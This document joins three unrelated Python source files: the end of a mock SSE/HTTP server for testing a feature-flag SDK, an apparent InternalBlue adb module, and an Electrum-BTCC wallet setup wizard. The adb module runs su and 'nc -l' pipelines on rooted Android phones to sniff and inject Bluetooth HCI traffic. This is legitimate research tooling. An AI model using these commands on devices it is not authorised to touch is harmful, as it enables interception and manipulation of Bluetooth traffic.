chunk += 'event: % s\n' % event['event'] if 'event' in event else ''
chunk += 'retry: % s\n' % event['retry'] if 'retry' in event else ''
chunk += 'data: % s\n' % event['data'] if 'data' in event else ''
if chunk != '':
write_chunk(chunk + '\r\n')
self.wfile.write('0\r\n\r\n'.encode('utf-8'))
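# Hedged usage sketch (not part of the mock server): a test can start the server,
# queue events plus the GRACEFUL_REQUEST_END sentinel, and read them back over a
# streaming GET. `requests` is assumed to be available in the test environment.
def _sse_mock_example():
    import requests
    server = SSEMockServer()
    server.start()
    server.publish({'id': '1', 'event': 'message', 'data': 'hello'})
    server.publish(SSEMockServer.GRACEFUL_REQUEST_END)
    resp = requests.get('http://localhost:%d' % server.port(), stream=True)
    body = b''.join(resp.iter_content(chunk_size=None))
    assert b'hello' in body
    server.stop()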
class SplitMockServer(object):
"""SDK server mock for testing purposes."""
protocol_version = 'HTTP/1.1'
def __init__(self, split_changes=None, segment_changes=None, req_queue=None,
auth_response=None):
"""
Construct a mock server.
:param changes: mapping of changeNumbers to splitChanges responses
:type changes: dict
"""
split_changes = split_changes if split_changes is not None else {}
segment_changes = segment_changes if segment_changes is not None else {}
self._server = HTTPServer(('localhost', 0),
lambda *xs: SDKHandler(split_changes, segment_changes, *xs,
req_queue=req_queue,
auth_response=auth_response))
self._server_thread = threading.Thread(target=self._blocking_run, name="SplitMockServer")
self._server_thread.setDaemon(True)
self._done_event = threading.Event()
def _blocking_run(self):
"""Execute."""
self._server.serve_forever()
self._done_event.set()
def port(self):
"""Return the assigned port."""
return self._server.server_port
def start(self):
"""Start the server asynchronously."""
self._server_thread.start()
def wait(self, timeout=None):
"""Wait for the server to shutdown."""
return self._done_event.wait(timeout)
def stop(self):
"""Stop the server."""
self._server.shutdown()
class SDKHandler(BaseHTTPRequestHandler):
"""Handler."""
def __init__(self, split_changes, segment_changes, *args, **kwargs):
"""Construct a handler."""
self._req_queue = kwargs.get('req_queue')
self._auth_response = kwargs.get('auth_response')
self._split_changes = split_changes
self._segment_changes = segment_changes
BaseHTTPRequestHandler.__init__(self, *args)
def _parse_qs(self):
raw_query = self.path.split('?')[1] if '?' in self.path else ''
if not raw_query:
return {}
return dict(item.split('=') for item in raw_query.split('&'))
def _handle_segment_changes(self):
qstring = self._parse_qs()
since = int(qstring.get('since', -1))
name = self.path.split('/')[-1].split('?')[0]
if name is None:
self.send_response(400)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write('{}'.encode('utf-8'))
return
to_send = self._segment_changes.get((name, since,))
if to_send is None:
self.send_response(404)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write('{}'.encode('utf-8'))
return
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(json.dumps(to_send).encode('utf-8'))
def _handle_split_changes(self):
qstring = self._parse_qs()
since = int(qstring.get('since', -1))
to_send = self._split_changes.get(since)
if to_send is None:
self.send_response(404)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write('{}'.encode('utf-8'))
return
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(json.dumps(to_send).encode('utf-8'))
def _handle_auth(self):
if not self._auth_response:
self.send_response(401)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write('{}'.encode('utf-8'))
return
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(json.dumps(self._auth_response).encode('utf-8'))
def do_GET(self): #pylint:disable=invalid-name
"""Respond to a GET request."""
if self._req_queue is not None:
headers = self._format_headers()
self._req_queue.put(Request('GET', self.path, headers, None))
if self.path.startswith('/api/splitChanges'):
self._handle_split_changes()
elif self.path.startswith('/api/segmentChanges'):
self._handle_segment_changes()
elif self.path.startswith('/api/auth'):
self._handle_auth()
else:
self.send_response(404)
self.send_header("Content-type", "application/json")
self.end_headers()
def do_POST(self): #pylint:disable=invalid-name
"""Respond to a POST request."""
if self._req_queue is not None:
headers = self._format_headers()
length = int(headers.get('content-length', 0))
body = self.rfile.read(length) if length else None
self._req_queue.put(Request('POST', self.path, headers, body))
if self.path in set(['/api/testImpressions/bulk', '/testImpressions/count',
'/api/events/bulk', '/metrics/times', '/metrics/count',
'/metrics/gauge']):
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
else:
self.send_response(404)
self.send_header("Content-type", "application/json")
self.end_headers()
def _format_headers(self):
"""Format headers and return them as a dict."""
return dict(zip([k.lower() for k in self.headers.keys()], self.headers.values()))
|
adbcore.py
|
#!/usr/bin/env python3
import struct
import threading
from time import sleep
from typing import Optional
from future import standard_library
import datetime
import socket
import queue as queue2k
import random
from ppadb.device import Device
from ppadb.connection import Connection
from ppadb.client import Client as AdbClient
from . import hci
from .utils import bytes_to_hex
from .utils.packing import u32
from .core import InternalBlue
standard_library.install_aliases()
class ADBCore(InternalBlue):
def __init__(
self,
queue_size=1000,
btsnooplog_filename="btsnoop.log",
log_level="info",
serial=False,
data_directory=".",
replay=False,
):
super(ADBCore, self).__init__(
queue_size,
btsnooplog_filename,
log_level,
data_directory,
replay,
)
# Connect to adb device
self.hciport: Optional[int] = None # hciport is the port number of the forwarded HCI snoop port (8872). The inject port is at hciport+1
self.serial = serial  # use su/busybox shell scripting via serial and do not try bluetooth.default.so
self.doublecheck = False
self.client = AdbClient(host="127.0.0.1", port=5037)
def device(self) -> Device:
return self.client.device(self.interface)
def device_list(self):
"""
Get a list of the connected devices
"""
if self.exit_requested:
self.shutdown()
if self.running:
self.logger.warning("Already running. call shutdown() first!")
return []
if self.replay:
return [(self, "adb_replay", "adb: ReplayDevice")]
# Check for connected adb devices
try:
adb_devices = self.client.devices()
except ValueError:
self.logger.info(
"Could not find devices with pwnlib. If you see devices with `adb devices`, try to remove the lines 'for field in fields[2:]:... = v' in `pwnlib/adb/adb.py`."
)
adb_devices = 0
except:
adb_devices = 0
if adb_devices == 0 or len(adb_devices) == 0:
self.logger.info("No adb devices found.")
return []
# At least one device found
self.logger.info("Found %d adb device(s)", len(adb_devices))
# Enumerate over found devices and put them into an array of tuple
# First index is a self reference of the class
# Second index is the identifier which is passed to connect()
# Third index is the label which is shown in options(...)
device_list = []
for d in adb_devices:
device_list.append((self, d.serial, "adb: %s (%s)" % (d.get_serial_no(), d.get_properties()['ro.product.model'])))
return device_list
def local_connect(self):
"""
Start the framework by connecting to the Bluetooth Stack of the Android
device via adb and the debugging TCP ports.
"""
# setup sockets
# on magisk-rooted devices there is sometimes already a read socket and this first setup needs to be skipped...
if not self.serial:
if not self._setupSockets():
self.logger.info("Could not connect using Bluetooth module.")
self.logger.info(
"Trying to set up connection for rooted smartphone with busybox installed."
)
else:
return True # successfully finished setup with bluetooth.default.so
if not self._setupSerialSu():
self.logger.critical("Failed to setup scripts for rooted devices.")
return False
# try again
if not self._setupSockets():
self.logger.critical("No connection to target device.")
self.logger.info(
"Check if:\n -> Bluetooth is active\n -> Bluetooth Stack has Debug Enabled\n -> BT HCI snoop log is activated\n -> USB debugging is authorized\n"
)
return False
return True
def _read_btsnoop_hdr(self):
"""
Read the btsnoop header (see RFC 1761) from the snoop socket (s_snoop).
"""
data = self.s_snoop.recv(16)
if len(data) < 16:
return None
if (self.write_btsnooplog) and self.btsnooplog_file.tell() == 0:
self.btsnooplog_file.write(data)
self.btsnooplog_file.flush()
btsnoop_hdr = (
data[:8],
u32(data[8:12], endian="big"),
u32(data[12:16], endian="big"),
)
self.logger.debug("BT Snoop Header: %s, version: %d, data link type: %d" % btsnoop_hdr)
return btsnoop_hdr
def _btsnoop_parse_time(self, time):
"""
Taken from: https://github.com/joekickass/python-btsnoop
Record time is a 64-bit signed integer representing the time of packet arrival,
in microseconds since midnight, January 1st, 0 AD nominal Gregorian.
In order to avoid leap-day ambiguity in calculations, note that an equivalent
epoch may be used of midnight, January 1st 2000 AD, which is represented in
this field as 0x00E03AB44A676000.
"""
time_betw_0_and_2000_ad = int("0x00E03AB44A676000", 16)
time_since_2000_epoch = datetime.timedelta(
microseconds=time
) - datetime.timedelta(microseconds=time_betw_0_and_2000_ad)
return datetime.datetime(2000, 1, 1) + time_since_2000_epoch
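# Worked example (illustrative only): a record timestamp of exactly
# 0x00E03AB44A676000 microseconds maps to datetime(2000, 1, 1, 0, 0, 0), since
# that constant is the offset between the btsnoop epoch and the year-2000 epoch.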
def _recvThreadFunc(self):
"""
This is the run-function of the recvThread. It receives HCI events from the
s_snoop socket. The HCI packets are encapsulated in btsnoop records (see RFC 1761).
Received HCI packets are being put into the queues inside registeredHciRecvQueues and
passed to the callback functions inside registeredHciCallbacks.
The thread stops when exit_requested is set to True. It will do that on its own
if it encounters a fatal error or the stackDumpReceiver reports that the chip crashed.
"""
self.logger.debug("Receive Thread started.")
while not self.exit_requested:
# Read the record header
record_hdr = b""
while not self.exit_requested and len(record_hdr) < 24:
try:
recv_data = self.s_snoop.recv(24 - len(record_hdr))
self.logger.debug(
"recvThreadFunc: received bt_snoop data "
+ bytes_to_hex(recv_data)
)
if len(recv_data) == 0:
self.logger.info(
"recvThreadFunc: bt_snoop socket was closed by remote site. stopping recv thread..."
)
self.exit_requested = True
break
record_hdr += recv_data
except socket.timeout:
pass # this is ok. just try again without error
if not record_hdr or len(record_hdr) != 24:
if not self.exit_requested:
self.logger.warning("recvThreadFunc: Cannot recv record_hdr. stopping.")
self.exit_requested = True
break
if self.write_btsnooplog:
self.btsnooplog_file.write(record_hdr)
self.btsnooplog_file.flush()
orig_len, inc_len, flags, drops, time64 = struct.unpack(
">IIIIq", record_hdr
)
# Read the record data
record_data = bytearray()
while not self.exit_requested and len(record_data) < inc_len:
try:
recv_data = self.s_snoop.recv(inc_len - len(record_data))
if len(recv_data) == 0:
self.logger.info(
"recvThreadFunc: bt_snoop socket was closed by remote site. stopping.."
)
self.exit_requested = True
break
record_data += bytearray(recv_data)
except socket.timeout:
pass # this is ok. just try again without error
if not record_data or len(record_data) != inc_len:
if not self.exit_requested:
self.logger.warning("recvThreadFunc: Cannot recv data. stopping.")
self.exit_requested = True
break
if self.write_btsnooplog:
self.btsnooplog_file.write(record_data)
self.btsnooplog_file.flush()
try:
parsed_time = self._btsnoop_parse_time(time64)
except OverflowError:
parsed_time = None
# Put all relevant infos into a tuple. The HCI packet is parsed with the help of hci.py.
record = (
hci.parse_hci_packet(record_data),
orig_len,
inc_len,
flags,
drops,
parsed_time,
)
# self.logger.debug(
# "_recvThreadFunc Recv: [" + str(parsed_time) + "] " + str(record[0])
# )
# Put the record into all queues of registeredHciRecvQueues if their
# filter function matches.
for queue, filter_function in self.registeredHciRecvQueues:
if filter_function == None or filter_function(record):
try:
queue.put(record, block=False)
except queue2k.Full:
self.logger.warning(
"recvThreadFunc: A recv queue is full. dropping packets.."
)
# Call all callback functions inside registeredHciCallbacks and pass the
# record as argument.
for callback in self.registeredHciCallbacks:
callback(record)
# Check if the stackDumpReceiver has noticed that the chip crashed.
# if self.stackDumpReceiver and self.stackDumpReceiver.stack_dump_has_happened:
# A stack dump has happened!
# self.logger.warning("recvThreadFunc: The controller sent a stack dump.")
# self.exit_requested = True
self.logger.debug("Receive Thread terminated.")
def _setupSockets(self):
"""
Forward the HCI snoop and inject ports from the Android device to
the host (using adb). Open TCP sockets (s_snoop, s_inject) to connect
to the forwarded ports. Read the btsnoop header from the s_snoop
socket in order to verify that the connection actually works correctly.
"""
# In order to support multiple parallel instances of InternalBlue
# (with multiple attached Android devices) we must not hard code the
# forwarded port numbers. Therefore we choose the port numbers
# randomly and hope that they are not already in use.
self.hciport = random.randint(
60000, 65534
)  # upper bound 65534 so that hciport + 1 stays within the valid port range
self.logger.debug(
"_setupSockets: Selected random ports snoop=%d and inject=%d"
% (self.hciport, self.hciport + 1)
)
# Forward ports 8872 and 8873. Ignore self.logger.info() outputs by the adb function.
self.device().forward(f"tcp:{self.hciport}", "tcp:8872")
self.device().forward(f"tcp:{self.hciport+1}", "tcp:8873")
# Connect to hci injection port
self.s_inject = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.s_inject.connect(("127.0.0.1", self.hciport + 1))
self.s_inject.settimeout(0.5)
except socket.error:
self.logger.warning("Could not connect to adb. Is your device authorized?")
return False
# Connect to hci snoop log port
self.s_snoop = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s_snoop.connect(("127.0.0.1", self.hciport))
self.s_snoop.settimeout(0.5)
# Read btsnoop header
if self._read_btsnoop_hdr() is None:
self.logger.warning("Could not read btsnoop header")
self.s_inject.close()
self.s_snoop.close()
self.s_inject = self.s_snoop = None
self.device().killforward_all()
return False
return True
def _teardownSockets(self):
"""
Close s_snoop and s_inject sockets. Remove port forwarding with adb.
"""
if self.s_inject != None:
self.s_inject.close()
self.s_inject = None
if self.s_snoop != None:
self.s_snoop.close()
self.s_snoop = None
if self.hciport is not None:
hciport = self.hciport
self.device().killforward_all()
def _spawn(self, cmd: str):
conn: Connection = self.device().create_connection()
cmd = "exec:{}".format(cmd)
conn.send(cmd)
while True:
sleep(1)
def _setupSerialSu(self):
"""
To run on any rooted device, we can also use some shellscripting.
This is slower but at least works on any device.
Commands on a S10e with Samsung Stock ROM + Magisk + busybox:
tail -f -n +0 /data/log/bt/btsnoop_hci.log | nc -l -p 8872
nc -l -p 8873 >/sdcard/internalblue_input.bin
tail -f /sdcard/internalblue_input.bin >>/dev/ttySAC1
Locations of the Bluetooth serial interface and btsnoop log file might differ.
The second part *could* be combined, but it somehow does not work (SELinux?).
The ADB Python bindings will kill the processes automatically :)
"""
# In sending direction, the format is different.
self.serial = True
# check dependencies
which_cmd = '''
echo $PATH | while read -d: directory; do
[ -x "$directory/{name}" ] || continue;
echo -n "$directory/{name}\\x00";
done
[ -x "{name}" ] && echo -n "$PWD/{name}\\x00"
'''.format(name="su")
su_path = self.device().shell(f"sh -c '{which_cmd}'")
if su_path is None or len(su_path) == 0:
self.logger.critical("su not found, rooted smartphone required!")
return False
if self.device().shell("su -c 'which nc'") == "":
self.logger.critical("nc not found, install busybox!")
return False
# automatically detect the proper serial device with lsof
logfile = self.device().shell("su -c \"lsof | grep btsnoop_hci.log | tail -n 1\" | awk '{print $NF}'")[:-1]
self.logger.info("Android btsnoop logfile %s...", logfile)
interface = self.device().shell("su -c \"lsof | grep bluetooth | grep tty\" | awk '{print $NF}'")[:-1]
self.logger.info("Android Bluetooth interface %s...", interface)
if logfile == "":
self.logger.critical("Could not find Bluetooth logfile. Enable Bluetooth snoop logging.")
return False
if interface == "":
self.logger.critical("Could not find Bluetooth interface. Enable Bluetooth.")
return False
# spawn processes
threading.Thread(target=self._spawn, args=(f"su -c \"tail -f -n +0 {logfile} | nc -l -p 8872\"",)).start()
threading.Thread(target=self._spawn, args=(f"su -c \"nc -l -p 8873 >/sdcard/internalblue_input.bin\"",)).start()
threading.Thread(target=self._spawn, args=(f"su -c \"tail -f /sdcard/internalblue_input.bin >> {interface}\"",)).start()
sleep(2)
return True
|
installwizard.py
|
import os
import sys
import threading
import traceback
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electrum_btcc.wallet import Wallet
from electrum_btcc.storage import WalletStorage
from electrum_btcc.util import UserCancelled, InvalidPassword
from electrum_btcc.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack
from electrum_btcc.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:T4PsyoR5gC8B... \t-> LXqi2tzER...\n' +
'p2wpkh-p2sh:T4PsyoR5gC8B... \t-> MUuWxSpVC...\n' +
'p2wpkh:T4PsyoR5gC8B... \t-> btcc1q3fjf...')
# note: full key is T4PsyoR5gC8BGEoTe8So7YQWPnvdkqTJqRVpLoMmZVqBsunDdeuJ
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config, app, plugins, storage):
BaseWizard.__init__(self, config, plugins, storage)
QDialog.__init__(self, None)
self.setWindowTitle('Electrum-BTCC - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for the base class
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/electrum-btcc.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def run_and_get_wallet(self, get_wallet_from_daemon):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electrum-BTCC wallet'))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
self.storage = wallet_from_memory.storage
else:
self.storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except BaseException:
traceback.print_exc(file=sys.stderr)
self.storage = None
self.next_button.setEnabled(False)
if self.storage:
if not self.storage.file_exists():
msg = _("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
elif not wallet_from_memory:
if self.storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
pw = True
elif self.storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
pw = False
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n)
while True:
if self.loop.exec_() != 2: # 2 = next
return
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if not self.storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(self.storage.path)
if wallet_from_memory:
return wallet_from_memory
if self.storage.file_exists() and self.storage.is_encrypted():
if self.storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
elif self.storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET)
except InvalidPassword as e:
QMessageBox.information(
None, _('Error'),
_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.stack = []
return self.run_and_get_wallet(get_wallet_from_daemon)
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
if self.storage.is_past_initial_decryption():
break
else:
return
else:
raise Exception('Unexpected encryption version')
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
action = self.storage.get_action()
if action and action not in ('new', 'upgrade_storage'):
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet
self.wallet = Wallet(self.storage)
return self.wallet
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(filename).scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(None, msg, kind, self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(None, MSG_HW_STORAGE_ENCRYPTION, PW_NEW, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
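# Poll the worker thread at roughly 60 Hz so the GUI keeps refreshing until the task completes.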
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def choice_and_line_dialog(self, title, message1, choices, message2,
test_text, run_next) -> (str, str):
vbox = QVBoxLayout()
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click)
vbox.addLayout(clayout.layout())
vbox.addSpacing(50)
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
